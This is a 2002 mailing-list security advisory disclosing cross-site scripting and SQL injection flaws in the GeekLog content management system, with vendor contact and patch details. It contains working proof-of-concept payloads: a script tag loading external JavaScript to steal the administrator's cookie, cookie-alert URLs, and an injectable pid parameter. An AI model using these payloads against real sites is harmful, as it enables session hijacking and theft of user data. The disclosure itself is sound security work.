OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Ahmet Sabri ALPER (s_alperhotmail.com)
Date: Mon Jun 10 2002 - 06:41:43 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ('binary' encoding is not supported, stored as-is) +/--------\-------- ALPER Research Labs ------/--------/+
    +/---------\------- Security Advisory -----/---------/+
    +/----------\------ ID: ARL02-A13 ----/----------/+
    +/-----------\----- salperolympos.org ---/-----------/+


    Advisory Information
    --------------------
    Name : Multiple Security Issues in GeekLog
    Software Package : GeekLog
    Vendor Homepage : http://geeklog.sourceforge.net/
    Vulnerable Versions: v1.3.5, v1.3.5rc1 and older
    Platforms : OS Independent, PHP
    Vulnerability Type : Input Validation Error
    Vendor Contacted : 31/05/2002
    Vendor Replied : 01/06/2002
    Prior Problems : N/A
    Current Version : v1.3.5rc1 (vulnerable)


    Summary
    -------
    GeekLog is a web content management system suitable for
    running full-featured community sites. It supports article
    posting, threaded comments, event scheduling, and link
    management and is built around a design philosophy that
    emphasizes ease of use.

    I have found these issues while testing the GeekLog system
    which was to be used at http://www.olympos.org, "Olympos
    Turkish Security Portal".
    2 different types of Cross Site Scripting issues, plus
    1 SQL Injection vulnerability was found in GeekLog.


    Details
    -------
    1. When any user sends a new Calender Event, the form is submitted
    to the site admin for approval. The $url variable, which holds the
    data given in the "Link" section of the form, is not filtered for
    malicious code. So a malicious user may get the cookie of the site
    administrator and therefore "own" the site.
    Also this issue may be exploited to run malicious code on the GeekLog
    site.
    Proof-of-concept Link input ($url):
    <script src="http://forum.olympos.org/f.js">Alper</script>

    2. Maliciously crafted links from third party sites may allow Cross
    Site Scripting attacks via "index.php" and/or "comment.php".
    Two examples for this;
    /index.php?topic=<script>alert(document.cookie)</script>
    /comment.php?mode=display&sid=foo&pid=18&title=<script>alert
    (document.cookie)</script>&type=article

    3. The $pid variable is directly passed to SQL input. This makes it
    possible for attackers to launch SQL injection attacks.
    /comment.php?
    mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs

    As the "Magic Quotes" function of PHP escapes the quoting characters,
    this third issue might just cause "light" headaches, but if the "Magic
    Quotes" is not active, the attacker may be able to get all the information
    about users from the SQL tables.


    Solution
    --------
    The vendor replied and acted quickly.
    A patch or a new version pointing this issue will
    soon be available via CVS or a FTP download from:
    http://www.sourceforge.net/projects/geeklog
    or
    http://geeklog.sourceforge.net

    The development team of GeekLog said that; they will
    be cleaning out the code for similar security issues,
    which were mentioned above.


    Credits
    -------
    Discovered on 31, May, 2002 by
    Ahmet Sabri ALPER <salperolympos.org>
    ALPER Research Labs.

    The ALPER Research Labs. [ARL] workers are freelancer
    security professionals and WhiteHat hackers. The ARL
    workers are available for hiring for legal jobs.
    The ARL also supports Open Software Community, by detecting
    possible security issues in GPL or any other Public Licensed
    product.


    References
    ----------
    Product Web Page: http://geeklog.sourceforge.net/
    Olympos: http://www.olympos.org/